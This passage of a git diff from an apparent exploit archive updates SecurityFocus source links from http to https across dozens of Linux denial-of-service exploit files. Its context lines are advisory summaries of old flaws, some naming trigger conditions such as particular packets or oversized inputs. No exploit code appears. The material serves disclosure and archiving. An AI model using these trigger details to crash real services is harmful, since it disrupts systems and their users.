+source: https://www.securityfocus.com/bid/7410/info Xeneo web server has been reported prone to an undisclosed buffer overflow vulnerability. diff --git a/exploits/linux/dos/22537.c b/exploits/linux/dos/22537.c index 248efe037..bbc3ebd3f 100644 --- a/exploits/linux/dos/22537.c +++ b/exploits/linux/dos/22537.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/7433/info +source: https://www.securityfocus.com/bid/7433/info Libopt library has been reported prone to a buffer overflow vulnerability. diff --git a/exploits/linux/dos/22560.txt b/exploits/linux/dos/22560.txt index 2254f4553..cd26b9717 100644 --- a/exploits/linux/dos/22560.txt +++ b/exploits/linux/dos/22560.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7486/info +source: https://www.securityfocus.com/bid/7486/info KDE Konqueror has been reported prone to a denial of service vulnerability when rendering a HTML page that contains malformed data. diff --git a/exploits/linux/dos/22619.txt b/exploits/linux/dos/22619.txt index 7f5459cbd..ecf08f0ed 100644 --- a/exploits/linux/dos/22619.txt +++ b/exploits/linux/dos/22619.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7637/info +source: https://www.securityfocus.com/bid/7637/info The cupsd has been reported prone to a denial of service vulnerability. diff --git a/exploits/linux/dos/22624.c b/exploits/linux/dos/22624.c index 2cd08585b..1914cd5bb 100644 --- a/exploits/linux/dos/22624.c +++ b/exploits/linux/dos/22624.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7649/info +// source: https://www.securityfocus.com/bid/7649/info BZFlag is prone to a denial of service vulnerability. Users that have established a session with BZFlag may cause a denial of service by reconnecting and flooding BZFlag ports with excessive amounts of data. diff --git a/exploits/linux/dos/22700.c b/exploits/linux/dos/22700.c index 4c2946c51..783cf8cbf 100644 --- a/exploits/linux/dos/22700.c +++ b/exploits/linux/dos/22700.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7770/info +// source: https://www.securityfocus.com/bid/7770/info myServer has been reported prone to a remote buffer overflow vulnerability. The vulnerability exists when the web server attempts to process HTTP GET requests of excessive length. diff --git a/exploits/linux/dos/22701.c b/exploits/linux/dos/22701.c index fc2d2d314..f589bc476 100644 --- a/exploits/linux/dos/22701.c +++ b/exploits/linux/dos/22701.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7770/info +// source: https://www.securityfocus.com/bid/7770/info myServer has been reported prone to a remote buffer overflow vulnerability. The vulnerability exists when the web server attempts to process HTTP GET requests of excessive length. diff --git a/exploits/linux/dos/22796.php b/exploits/linux/dos/22796.php index 85519918b..ea4753437 100644 --- a/exploits/linux/dos/22796.php +++ b/exploits/linux/dos/22796.php @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7956/info +source: https://www.securityfocus.com/bid/7956/info It has been reported that MidHosting FTP Daemon does not properly implement shared memory when the m flag (-m) is enabled. Because of this, an attacker could corrupt process memory, causing the service to crash. diff --git a/exploits/linux/dos/22800.txt b/exploits/linux/dos/22800.txt index f2cdcb295..90583b0e4 100644 --- a/exploits/linux/dos/22800.txt +++ b/exploits/linux/dos/22800.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7967/info +source: https://www.securityfocus.com/bid/7967/info Multiple buffer overrun vulnerabilities have been discovered in Kerio MailServer, which affect the webmail component. The problem occurs when handling usernames of excessive length and likely occurs due to insufficient bounds checking. Due to the similarity of these issues it has been conjectured that the root of the problem may be a single function used to handle all affected procedures. diff --git a/exploits/linux/dos/22801.txt b/exploits/linux/dos/22801.txt index 910cd8aeb..ab32b129c 100644 --- a/exploits/linux/dos/22801.txt +++ b/exploits/linux/dos/22801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7967/info +source: https://www.securityfocus.com/bid/7967/info Multiple buffer overrun vulnerabilities have been discovered in Kerio MailServer, which affect the webmail component. The problem occurs when handling usernames of excessive length and likely occurs due to insufficient bounds checking. Due to the similarity of these issues it has been conjectured that the root of the problem may be a single function used to handle all affected procedures. diff --git a/exploits/linux/dos/22802.txt b/exploits/linux/dos/22802.txt index 177d9e92d..210580b6f 100644 --- a/exploits/linux/dos/22802.txt +++ b/exploits/linux/dos/22802.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7967/info +source: https://www.securityfocus.com/bid/7967/info Multiple buffer overrun vulnerabilities have been discovered in Kerio MailServer, which affect the webmail component. The problem occurs when handling usernames of excessive length and likely occurs due to insufficient bounds checking. Due to the similarity of these issues it has been conjectured that the root of the problem may be a single function used to handle all affected procedures. diff --git a/exploits/linux/dos/22803.txt b/exploits/linux/dos/22803.txt index 6b6c8fffc..f63a3ad59 100644 --- a/exploits/linux/dos/22803.txt +++ b/exploits/linux/dos/22803.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/7967/info +source: https://www.securityfocus.com/bid/7967/info Multiple buffer overrun vulnerabilities have been discovered in Kerio MailServer, which affect the webmail component. The problem occurs when handling usernames of excessive length and likely occurs due to insufficient bounds checking. Due to the similarity of these issues it has been conjectured that the root of the problem may be a single function used to handle all affected procedures. diff --git a/exploits/linux/dos/22814.txt b/exploits/linux/dos/22814.txt index fe364446f..3e365e22d 100644 --- a/exploits/linux/dos/22814.txt +++ b/exploits/linux/dos/22814.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8003/info +source: https://www.securityfocus.com/bid/8003/info A heap overflow vulnerability has been reported for the pr-edit utility of GNATS. The vulnerability occurs due to insufficient checks performed on the arguments to the '-d' commandline option. diff --git a/exploits/linux/dos/22839.c b/exploits/linux/dos/22839.c index 30f7718e2..e9e752f8b 100644 --- a/exploits/linux/dos/22839.c +++ b/exploits/linux/dos/22839.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8038/info +// source: https://www.securityfocus.com/bid/8038/info Behamut IRCd has been reported prone to remotely exploitable format string vulnerability. diff --git a/exploits/linux/dos/22846.pl b/exploits/linux/dos/22846.pl index 91ed929e4..d05c580e3 100755 --- a/exploits/linux/dos/22846.pl +++ b/exploits/linux/dos/22846.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8069/info +source: https://www.securityfocus.com/bid/8069/info An individual has reported that Adobe Acrobat Reader for Unix systems is vulnerable to a buffer overflow condition. The error is allegedly related to the processing of hyperlinks, in the function "WWWLaunchNetscape". The flaw is triggered only when Netscape is set as the browser to be used in the preferences (this is the default configuration). This vulnerability may be exploited through maliciously constructed PDF files. diff --git a/exploits/linux/dos/22897.c b/exploits/linux/dos/22897.c index 6757253e8..5e404fd6a 100644 --- a/exploits/linux/dos/22897.c +++ b/exploits/linux/dos/22897.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8181/info +// source: https://www.securityfocus.com/bid/8181/info It has been reported that Twilight WebServer may be prone to a remote buffer overflow vulnerability. The problem may be present due to a lack of bounds checking performed on incoming GET requests. Arbitrary code execution may be possible. diff --git a/exploits/linux/dos/22952.txt b/exploits/linux/dos/22952.txt index 384666074..3072e59ac 100644 --- a/exploits/linux/dos/22952.txt +++ b/exploits/linux/dos/22952.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8255/info +source: https://www.securityfocus.com/bid/8255/info xfstt is reported to be prone to an unspecified memory disclosure vulnerability. This issue can be triggered by remote attackers to cause a denial of service. The server may also return details about the memory layout of the underlying system when this issue is triggered. diff --git a/exploits/linux/dos/22981.c b/exploits/linux/dos/22981.c index 1ac8d9e7e..da75b4a64 100644 --- a/exploits/linux/dos/22981.c +++ b/exploits/linux/dos/22981.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8333/info +// source: https://www.securityfocus.com/bid/8333/info Debian has reported two vulnerabilities in the Postfix mail transfer agent. The first vulnerability, CAN-2003-0468, can allow for an adversary to "bounce-scan" a private network. It has also been reported that this vulnerability can be exploited to use the server as a distributed denial of service tool. These attacks are reportedly possible through forcing the server to connect to an arbitrary port on an arbitrary host. diff --git a/exploits/linux/dos/22982.pl b/exploits/linux/dos/22982.pl index b42e892cb..cd6ee439d 100755 --- a/exploits/linux/dos/22982.pl +++ b/exploits/linux/dos/22982.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8333/info +source: https://www.securityfocus.com/bid/8333/info Debian has reported two vulnerabilities in the Postfix mail transfer agent. The first vulnerability, CAN-2003-0468, can allow for an adversary to "bounce-scan" a private network. It has also been reported that this vulnerability can be exploited to use the server as a distributed denial of service tool. These attacks are reportedly possible through forcing the server to connect to an arbitrary port on an arbitrary host. diff --git a/exploits/linux/dos/23048.txt b/exploits/linux/dos/23048.txt index 4f512c2ad..59b5802ca 100644 --- a/exploits/linux/dos/23048.txt +++ b/exploits/linux/dos/23048.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8466/info +source: https://www.securityfocus.com/bid/8466/info A vulnerability has been reported in srcpd that allows a remote attacker to cause a denial of service by exploiting an integer overflow error. The exploitation of this problem would consist of an attacker connecting to a server and issuing the "go" command with a large integer value, causing an overflow condition. diff --git a/exploits/linux/dos/23112.txt b/exploits/linux/dos/23112.txt index ce6276fd8..18b11cd16 100644 --- a/exploits/linux/dos/23112.txt +++ b/exploits/linux/dos/23112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8552/info +source: https://www.securityfocus.com/bid/8552/info It has been reported that the IBM DB2 db2dart utility is prone to locally exploitable buffer overflow vulnerability. A local attacker, who can authenticate or has access as the db2as user, may exploit this issue to execute arbitrary instructions with elevated privileges. Specifically, user 'root' privileges. diff --git a/exploits/linux/dos/23116.pl b/exploits/linux/dos/23116.pl index 40d32bb07..cb480c1a6 100755 --- a/exploits/linux/dos/23116.pl +++ b/exploits/linux/dos/23116.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8558/info +source: https://www.securityfocus.com/bid/8558/info A remote denial of service vulnerability has been reported to affect the mah-jong game server. The issue has been reported to be exploitable so that a remote attacker may trigger a tight loop in the affected mah-jong server. This will cause the game server to be unresponsive to further commands, effectively denying service to legitimate users. diff --git a/exploits/linux/dos/23138.txt b/exploits/linux/dos/23138.txt index b56ff4241..05efd2f6f 100644 --- a/exploits/linux/dos/23138.txt +++ b/exploits/linux/dos/23138.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8590/info +source: https://www.securityfocus.com/bid/8590/info MySQL server has been reported prone to a buffer overflow vulnerability when handling user passwords of excessive size. diff --git a/exploits/linux/dos/23170.c b/exploits/linux/dos/23170.c index 06133d1f2..79b84d395 100644 --- a/exploits/linux/dos/23170.c +++ b/exploits/linux/dos/23170.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8679/info +// source: https://www.securityfocus.com/bid/8679/info A remotely exploitable buffer overrun vulnerability has been reported in ProFTPD. This issue could be triggered if an attacker uploads a malformed file and then that file is downloaded in ASCII mode. Successful exploitation will permit a malicious FTP user with upload access to execute arbitrary code in the context of the FTP server. diff --git a/exploits/linux/dos/23172.txt b/exploits/linux/dos/23172.txt index ff0e76961..2bf5910e2 100644 --- a/exploits/linux/dos/23172.txt +++ b/exploits/linux/dos/23172.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8683/info +source: https://www.securityfocus.com/bid/8683/info The Gauntlet Firewall SQL gateway (sql-gw) is prone to denial of service attacks. It is possible to trigger this condition by making multiple connections to the port which the service listens on. The service will need to be restarted to regain normal functionality. diff --git a/exploits/linux/dos/23200.txt b/exploits/linux/dos/23200.txt index 1b203222d..f4a223c0f 100644 --- a/exploits/linux/dos/23200.txt +++ b/exploits/linux/dos/23200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8734/info +source: https://www.securityfocus.com/bid/8734/info It has been reported that Gamespy 3D IRC client may be prone to a remote buffer overflow vulnerability due to insufficient boundary checking. The issue is reported to present itself when the client attempts to connect to a remote IRC server. During the connection process the client is reported to a send USER and NICK requests to the server. A buffer overflow condition may occur if the server responds with a request that is larger than or equal to 262 bytes. diff --git a/exploits/linux/dos/23239.c b/exploits/linux/dos/23239.c index 42c22192a..852ed8c7c 100644 --- a/exploits/linux/dos/23239.c +++ b/exploits/linux/dos/23239.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8817/info +// source: https://www.securityfocus.com/bid/8817/info IRCnet IRCD has been reported prone to a buffer overflow vulnerability that may be exploited by local users. This issue may be exploited to crash the affected server. Although unconfirmed, due to the nature of this vulnerability it has been conjectured that a local attacker may also leverage this condition to potentially have arbitrary instructions executed in the context of the affected server. diff --git a/exploits/linux/dos/23245.pl b/exploits/linux/dos/23245.pl index 04855f86b..14aec380b 100755 --- a/exploits/linux/dos/23245.pl +++ b/exploits/linux/dos/23245.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8824/info +source: https://www.securityfocus.com/bid/8824/info Apache Tomcat 4 has been reported prone to a remotely triggered denial-of-service vulnerability when handling undisclosed non-HTTP request types. diff --git a/exploits/linux/dos/23274.pl b/exploits/linux/dos/23274.pl index 8a0f70a56..445d9994b 100755 --- a/exploits/linux/dos/23274.pl +++ b/exploits/linux/dos/23274.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8875/info +source: https://www.securityfocus.com/bid/8875/info Coreutils 'ls' has been reported prone to an integer overflow vulnerability. The issue reportedly presents itself when handling width and column display command line arguments. It has been reported that excessive values passed as a width argument to 'ls' may cause an internal integer value to be misrepresented. Further arithmetic performed based off this misrepresented value may have unintentional results. diff --git a/exploits/linux/dos/23305.c b/exploits/linux/dos/23305.c index d0acea1b1..8dbf612cb 100644 --- a/exploits/linux/dos/23305.c +++ b/exploits/linux/dos/23305.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/8906/info +source: https://www.securityfocus.com/bid/8906/info A vulnerability has been reported in thttpd that may allow a remote attacker to execute arbitrary code on vulnerable host. The issue is reported to exist due to a lack of bounds checking by software, leading to a buffer overflow condition. The problem is reported to exist in the defang() function in libhttpd.c. diff --git a/exploits/linux/dos/23347.txt b/exploits/linux/dos/23347.txt index 6e40aa750..3c0c7fce2 100644 --- a/exploits/linux/dos/23347.txt +++ b/exploits/linux/dos/23347.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8990/info +source: https://www.securityfocus.com/bid/8990/info IBM DB2 has been reported to be prone to multiple buffer overflow vulnerabilities that present themselves in binaries that are shipped with DB2. The vulnerabilities are likely caused due to a lack of sufficient boundary checks performed on user supplied command-line arguments before they are copied into a reserved buffer in memory. It has been reported that by supplying arguments of excessive length to the respective vulnerable executables a local attacker may trigger the execution of arbitrary attacker-supplied instructions with elevated privileges. diff --git a/exploits/linux/dos/23348.txt b/exploits/linux/dos/23348.txt index d2a26645d..88eb31d85 100644 --- a/exploits/linux/dos/23348.txt +++ b/exploits/linux/dos/23348.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8990/info +source: https://www.securityfocus.com/bid/8990/info IBM DB2 has been reported to be prone to multiple buffer overflow vulnerabilities that present themselves in binaries that are shipped with DB2. The vulnerabilities are likely caused due to a lack of sufficient boundary checks performed on user supplied command-line arguments before they are copied into a reserved buffer in memory. It has been reported that by supplying arguments of excessive length to the respective vulnerable executables a local attacker may trigger the execution of arbitrary attacker-supplied instructions with elevated privileges. diff --git a/exploits/linux/dos/23349.txt b/exploits/linux/dos/23349.txt index 4a197133a..5be3be2e1 100644 --- a/exploits/linux/dos/23349.txt +++ b/exploits/linux/dos/23349.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/8990/info +source: https://www.securityfocus.com/bid/8990/info IBM DB2 has been reported to be prone to multiple buffer overflow vulnerabilities that present themselves in binaries that are shipped with DB2. The vulnerabilities are likely caused due to a lack of sufficient boundary checks performed on user supplied command-line arguments before they are copied into a reserved buffer in memory. It has been reported that by supplying arguments of excessive length to the respective vulnerable executables a local attacker may trigger the execution of arbitrary attacker-supplied instructions with elevated privileges. diff --git a/exploits/linux/dos/23375.txt b/exploits/linux/dos/23375.txt index 2c72d51c2..c0870cf67 100644 --- a/exploits/linux/dos/23375.txt +++ b/exploits/linux/dos/23375.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9029/info +source: https://www.securityfocus.com/bid/9029/info It has been reported that Zebra, as well as Quagga, may be vulnerable to a remote denial of service vulnerability that may allow an attacker to cause the software to crash or hang. The issue is reported to occur if an attacker attempts to connect to the Zebra telnet management port while a password is enabled. The program will crash when attempting to dereference an invalid, possibly NULL, pointer. diff --git a/exploits/linux/dos/23391.txt b/exploits/linux/dos/23391.txt index d9bf3f280..ff56a5989 100644 --- a/exploits/linux/dos/23391.txt +++ b/exploits/linux/dos/23391.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9079/info +source: https://www.securityfocus.com/bid/9079/info FreeRADIUS is prone to a heap-corruption vulnerability when handling of tag-field input. An attacker may be able to exploit this issue to deny service to legitimate users of a vulnerable FreeRADIUS server. diff --git a/exploits/linux/dos/23393.c b/exploits/linux/dos/23393.c index 376ed95b5..b7200fc17 100644 --- a/exploits/linux/dos/23393.c +++ b/exploits/linux/dos/23393.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9090/info +// source: https://www.securityfocus.com/bid/9090/info A problem has been reported in the handling of certain file types by gEdit. Memory corruption may occur when handling files containing long strings. Because of this, it may be possible to cause memory corruption. diff --git a/exploits/linux/dos/23438.pl b/exploits/linux/dos/23438.pl index 616feb672..c1fcad315 100755 --- a/exploits/linux/dos/23438.pl +++ b/exploits/linux/dos/23438.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9217/info +source: https://www.securityfocus.com/bid/9217/info It has been reported that X-Chat may be prone to a remote denial of service vulnerability that may allow an attacker to crash the client by sending a malicious 'DDC SEND' request. diff --git a/exploits/linux/dos/23452.txt b/exploits/linux/dos/23452.txt index 9106d7407..8465de1a2 100644 --- a/exploits/linux/dos/23452.txt +++ b/exploits/linux/dos/23452.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9263/info +source: https://www.securityfocus.com/bid/9263/info A vulnerability has been reported to exist in the software that may allow a remote attacker to cause a denial of service condition in tcpdump. The issue presents itself when an attacker sends a maliciously formatted packet containing 0xff,0x02 bytes to UDP port 1701 of a system running a vulnerable version of tcpdump. diff --git a/exploits/linux/dos/23539.txt b/exploits/linux/dos/23539.txt index 19abf7805..02f6f540f 100644 --- a/exploits/linux/dos/23539.txt +++ b/exploits/linux/dos/23539.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9402/info +source: https://www.securityfocus.com/bid/9402/info It has been reported that FTPServer/X may be prone to a remote format string vulnerability when processing a malicious request from a client. The vulnerability presents itself when the server receives a malicious request containing embedded format string specifiers from a remote client when supplying a username during FTP authentication. This could be exploited to crash the server but could also theoretically permit corruption/disclosure of memory contents and execution of arbitrary code. diff --git a/exploits/linux/dos/23662.c b/exploits/linux/dos/23662.c index 18b05adc9..3d35d8065 100644 --- a/exploits/linux/dos/23662.c +++ b/exploits/linux/dos/23662.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9604/info +// source: https://www.securityfocus.com/bid/9604/info It has been reported that Nadeo Game Engine may be prone to a remote denial of service vulnerability that could allow an attacker to cause the software to crash or hang by sending arbitrary data to the software on TCP port 2350. diff --git a/exploits/linux/dos/23667.txt b/exploits/linux/dos/23667.txt index d8f17c48b..1657899dd 100644 --- a/exploits/linux/dos/23667.txt +++ b/exploits/linux/dos/23667.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9610/info +source: https://www.securityfocus.com/bid/9610/info A problem in the handling of specially crafted UUEncoded messages has been identified in ClamAV. Because of this, an attacker may prevent the delivery of e-mail to users. diff --git a/exploits/linux/dos/23690.txt b/exploits/linux/dos/23690.txt index bd0ce7cef..8ce41e745 100644 --- a/exploits/linux/dos/23690.txt +++ b/exploits/linux/dos/23690.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9652/info +source: https://www.securityfocus.com/bid/9652/info It has been reported that the XFree86 X Windows system is prone to a local buffer overflow vulnerability. The issue arises from improper bounds checking when parsing the 'font.alias' file. Successful exploitation of this issue may allow an attacker to gain root privileges to the affected system. diff --git a/exploits/linux/dos/23757.txt b/exploits/linux/dos/23757.txt index 532921cae..fd808420c 100644 --- a/exploits/linux/dos/23757.txt +++ b/exploits/linux/dos/23757.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9741/info +source: https://www.securityfocus.com/bid/9741/info It has been reported that the GameSpy SDK is prone to a remote denial of service vulnerability. This issue is due to the software failing to handle exceptional conditions during network communication. diff --git a/exploits/linux/dos/23884.txt b/exploits/linux/dos/23884.txt index 8e7ce3478..fbef4b28b 100644 --- a/exploits/linux/dos/23884.txt +++ b/exploits/linux/dos/23884.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/9989/info +source: https://www.securityfocus.com/bid/9989/info It has been reported that NSTX is prone to a remote denial of service vulnerability. This issue is due to a failure of the application to handle network strings of excessive length. diff --git a/exploits/linux/dos/23896.txt b/exploits/linux/dos/23896.txt index 3a61d6d48..a414c9fc1 100644 --- a/exploits/linux/dos/23896.txt +++ b/exploits/linux/dos/23896.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10008/info +source: https://www.securityfocus.com/bid/10008/info It has been reported that MPlayer is prone to a remote HTTP header buffer overflow vulnerability. This issue is due to a failure of the application to properly verify buffer bounds on the 'Location' HTTP header during parsing. diff --git a/exploits/linux/dos/23943.txt b/exploits/linux/dos/23943.txt index e44ec0a7b..4174cfef7 100644 --- a/exploits/linux/dos/23943.txt +++ b/exploits/linux/dos/23943.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10092/info +source: https://www.securityfocus.com/bid/10092/info It has been reported that Crackalaka may be prone to a remote denial of service vulnerability that may allow an attacker to crash the server by sending an excessive amount of data. diff --git a/exploits/linux/dos/23946.c b/exploits/linux/dos/23946.c index a2098f357..06cdcc548 100644 --- a/exploits/linux/dos/23946.c +++ b/exploits/linux/dos/23946.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/10096/info +source: https://www.securityfocus.com/bid/10096/info A vulnerability has been reported in the Linux Kernel that may permit a malicious local user to affect a system-wide denial of service condition. This issue may be triggered via the Kernel signal queue (struct sigqueue) and may be exploited to exhaust the system process table by causing an excessive number of threads to be left in a zombie state. */ diff --git a/exploits/linux/dos/23999.txt b/exploits/linux/dos/23999.txt index f9446a0dc..f76ffa6e1 100644 --- a/exploits/linux/dos/23999.txt +++ b/exploits/linux/dos/23999.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10136/info +source: https://www.securityfocus.com/bid/10136/info It has been reported that the Neon client library is prone to multiple remote format string vulnerabilities. This issue is due to a failure of the application to properly implement format string functions. diff --git a/exploits/linux/dos/24078.c b/exploits/linux/dos/24078.c index fc00a2731..d370d1076 100644 --- a/exploits/linux/dos/24078.c +++ b/exploits/linux/dos/24078.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/10264/info +source: https://www.securityfocus.com/bid/10264/info PaX for 2.6 series Linux kernels has been reported prone to a local denial of service vulnerability. The issue is reported to present itself when PaX Address Space Layout Randomization Layout (ASLR) is enabled. diff --git a/exploits/linux/dos/24095.txt b/exploits/linux/dos/24095.txt index d0e123950..3e95f0d03 100644 --- a/exploits/linux/dos/24095.txt +++ b/exploits/linux/dos/24095.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10295/info +source: https://www.securityfocus.com/bid/10295/info A remote buffer overflow vulnerability has been reported to affect the DeleGate SSLway filter. This filter is employed when DeleGate is applying SSL to arbitrary protocols. diff --git a/exploits/linux/dos/24096.pl b/exploits/linux/dos/24096.pl index cd58cca59..c6046a190 100755 --- a/exploits/linux/dos/24096.pl +++ b/exploits/linux/dos/24096.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10298/info +source: https://www.securityfocus.com/bid/10298/info Qualcomm Eudora is reported to be prone to a remotely exploitable buffer overrun vulnerability. diff --git a/exploits/linux/dos/24222.c b/exploits/linux/dos/24222.c index 73fcf0e4a..b967af5a3 100644 --- a/exploits/linux/dos/24222.c +++ b/exploits/linux/dos/24222.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10572/info +// source: https://www.securityfocus.com/bid/10572/info A denial of service vulnerability exists in multiple ircd implementations. This exists because of an issue with the deallocation of buffers used by rate limiting mecahnisms in the ircd. This could result in exhaustion of memory resources on the system running the ircd. diff --git a/exploits/linux/dos/24346.txt b/exploits/linux/dos/24346.txt index e2311985f..a446153c3 100644 --- a/exploits/linux/dos/24346.txt +++ b/exploits/linux/dos/24346.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10843/info +source: https://www.securityfocus.com/bid/10843/info It is reported that Mozilla and Netscape contain an integer overflow vulnerability in the SOAPParameter object constructor. This overflow may result in the corruption of critical heap memory structures, leading to possible remote code execution. diff --git a/exploits/linux/dos/24355.txt b/exploits/linux/dos/24355.txt index e2e10f938..21a2a11b7 100644 --- a/exploits/linux/dos/24355.txt +++ b/exploits/linux/dos/24355.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10882/info +source: https://www.securityfocus.com/bid/10882/info GNU Info is reported prone to a buffer overrun vulnerability. The vulnerability is reported to present itself due to a lack of boundary checks performed on argument data for the (f) follow xref Info command. diff --git a/exploits/linux/dos/24358.txt b/exploits/linux/dos/24358.txt index acf7fd1f4..b531a05e3 100644 --- a/exploits/linux/dos/24358.txt +++ b/exploits/linux/dos/24358.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10890/info +source: https://www.securityfocus.com/bid/10890/info It is reported that the xine media library is affected by a remote buffer overflow vulnerability. This issue can allow a remote attacker to gain unauthorized access to a vulnerable computer. diff --git a/exploits/linux/dos/24360.py b/exploits/linux/dos/24360.py index 57ec84234..f0ccecdb0 100755 --- a/exploits/linux/dos/24360.py +++ b/exploits/linux/dos/24360.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/10899/info +source: https://www.securityfocus.com/bid/10899/info GNU cfengine cfservd is reported prone to a remote heap-based buffer overrun vulnerability. The vulnerability presents itself in the cfengine cfservd AuthenticationDialogue() function. diff --git a/exploits/linux/dos/24569.txt b/exploits/linux/dos/24569.txt index d2c2c0abe..a09253502 100644 --- a/exploits/linux/dos/24569.txt +++ b/exploits/linux/dos/24569.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11104/info +source: https://www.securityfocus.com/bid/11104/info QNX PPPoEd is reported to be prone to multiple local buffer overflow vulnerabilities. The issues presents themselves when PPPoEd handles certain command line arguments that are greater than 256 bytes in length. diff --git a/exploits/linux/dos/24590.txt b/exploits/linux/dos/24590.txt index a3cae8621..92aec482e 100644 --- a/exploits/linux/dos/24590.txt +++ b/exploits/linux/dos/24590.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11154/info +source: https://www.securityfocus.com/bid/11154/info Apache 2.x mod_ssl is reported prone to a remote denial of service vulnerability. This issue likely exists because the application fails to handle exceptional conditions. The vulnerability originates in the 'char_buffer_read' function of the 'ssl_engine_io.c' file. diff --git a/exploits/linux/dos/24599.txt b/exploits/linux/dos/24599.txt index 653c304b6..760509a10 100644 --- a/exploits/linux/dos/24599.txt +++ b/exploits/linux/dos/24599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11183/info +source: https://www.securityfocus.com/bid/11183/info CUPS is prone to a remotely exploitable denial of service vulnerability that may be triggered through port 631 by a zero-length UDP packet. diff --git a/exploits/linux/dos/24677.txt b/exploits/linux/dos/24677.txt index bbcf7a389..80a6e06fc 100644 --- a/exploits/linux/dos/24677.txt +++ b/exploits/linux/dos/24677.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11400/info +source: https://www.securityfocus.com/bid/11400/info IBM DB2 is reported prone to a denial of service vulnerability when DTS to string conversion is carried out. diff --git a/exploits/linux/dos/24696.c b/exploits/linux/dos/24696.c index 744c48175..2375f8dd2 100644 --- a/exploits/linux/dos/24696.c +++ b/exploits/linux/dos/24696.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/11488/info +source: https://www.securityfocus.com/bid/11488/info It is reported that an integer underflow vulnerability is present in the iptables logging rules of the Linux kernel 2.6 branch. diff --git a/exploits/linux/dos/24755.java b/exploits/linux/dos/24755.java index c76c3c402..61d226b37 100644 --- a/exploits/linux/dos/24755.java +++ b/exploits/linux/dos/24755.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11712/info +source: https://www.securityfocus.com/bid/11712/info Multiple remote vulnerabilities reportedly affect the Opera Web Browser Java implementation. These issues are due to the insecure proprietary design of the Web browser's Java implementation. diff --git a/exploits/linux/dos/24756.java b/exploits/linux/dos/24756.java index 407be74c7..4a75f16f5 100644 --- a/exploits/linux/dos/24756.java +++ b/exploits/linux/dos/24756.java @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11712/info +source: https://www.securityfocus.com/bid/11712/info Multiple remote vulnerabilities reportedly affect the Opera Web Browser Java implementation. These issues are due to the insecure proprietary design of the Web browser's Java implementation. diff --git a/exploits/linux/dos/24777.txt b/exploits/linux/dos/24777.txt index 33ef8e52f..709e2524d 100644 --- a/exploits/linux/dos/24777.txt +++ b/exploits/linux/dos/24777.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11754/info +source: https://www.securityfocus.com/bid/11754/info The 